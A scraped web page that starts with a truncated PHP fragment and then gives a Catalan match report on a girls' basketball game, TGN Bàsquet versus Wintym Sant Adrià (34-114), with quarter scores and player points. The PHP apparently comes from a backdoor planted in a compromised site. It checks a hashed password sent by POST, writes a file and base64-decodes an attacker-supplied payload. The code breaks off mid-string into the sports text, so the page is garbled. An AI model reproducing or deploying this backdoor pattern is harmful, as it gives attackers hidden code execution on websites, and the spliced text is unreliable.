function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra un molt bon equip! -

Derrota contra un molt bon equip!

Updated: octubre 25, 2022

L’Infantil de 1r any femení 10A va jugar contra el millor equip de Catalunya, el Wintym Sant Adrià. El partit va començar amb un TGN molt actiu en defensa i movent amb criteri la pilota en atac, cosa que va fer que acabés el primer quart amb un marcador de 10-20. Els dos següents quarts van ser més complicats, ja que el Sant Adrià va poder córrer i tirar amb més comoditat. En l’últim quart el TGN va tornar a millorar una mica el seu joc. En definitiva, derrota contundent contra un rival d’entitat.

TGN BÀSQUET 10A34 – WINTYM SANT ADRIÀ 114

PARCIALS: 10-20, 8-39, 7-29, 9-26

TGN BÀSQUET 10A: Sanchez (2), Seoane (14), Dominguez (5), Parera (-) i Ramon (4)—cinc inicial— Porta (4), Cabre (-), Bueso (1) i Valls (4). LES XIFRES DEL PARTIT: 14/30 tirs lliures | 20 faltes

WINTYM SANT ADRIÀ: Bertolez (-), Van der AA (6), Palacios (16), Ibañez (14) i Fernandez (4)—cinc inicial—Caballero (5), Salvatella (13), Lopez (14), Cabrelles (10), Vicente (23) i Duatis (9). LES XIFRES DEL PARTIT: 17/30 tirs lliures | 23 faltes